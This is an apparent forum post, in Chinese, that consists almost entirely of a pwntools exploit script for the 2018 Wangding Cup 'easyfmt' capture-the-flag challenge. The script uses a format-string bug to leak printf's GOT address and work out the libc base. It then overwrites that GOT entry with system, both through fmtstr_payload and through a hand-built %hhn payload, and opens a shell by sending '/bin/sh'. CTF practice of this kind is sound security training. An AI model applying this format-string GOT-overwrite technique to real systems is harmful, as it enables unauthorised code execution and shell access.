roger 发表于 2020-8-31 17:14:15

王鼎杯wdb_2018_pwn_2nd-easyfmt-89

expfrom pwn import *

context.log_level = 'debug'
p = process('./wdb_2018_2nd_easyfmt')
#p = process('./idaidg/linux_server')
#p = remote('node3.buuoj.cn',29254)
elf = ELF('./wdb_2018_2nd_easyfmt')
libc = elf.libc
#libc = ELF('./libc/libc-2.23x86.so')

p.recvuntil('Do you know repeater?')
   
p.send(p32(0x804A014) + '%6$s')
p.recv()
#sleep(1)
printf = p.recvuntil('\xf7')[-4:]
printf_addr = u32(printf)
print 'printf_addr:' + hex(printf_addr)

libcbase = printf_addr - libc.symbols['printf']

print"libcbase:"+ hex(libcbase)

#gdb.attach(p)

system = libcbase + libc.symbols['system']

print"system:"+hex(system)

a1 = system % (16*16)
a2 = (system / (16*16))%(16*16)
a3 = (system / (16*16*16*16))%(16*16)
a4 = (system / (16*16*16*16*16*16))%(16*16)

print"a1,a2,a3,a4:"+hex(a1)+','+hex(a2)+','+hex(a3)+','+hex(a4)
payload1 = fmtstr_payload(6,{0x804A014:system})

payload = p32(0x804A014)
payload += p32(0x804A014 + 1)
payload += p32(0x804A014 + 2)
payload += p32(0x804A014 + 3)
payload += '%'
payload += str(a1 - 16)
payload += 'c%6$hhn'
payload += '%'
payload += str((0x100+a2) - a1)
payload += 'c%7$hhn'
payload += '%'
payload += str((0x100+a3) - a2)
payload += 'c%8$hhn'
payload += '%'
payload += str((0x100+a4) - a3)
payload += 'c%9$hhn'

sleep(1)

p.send(payload1)

sleep(1)
p.send('/bin/sh\x00')

p.interactive()


页: [1]
查看完整版本: 王鼎杯wdb_2018_pwn_2nd-easyfmt-89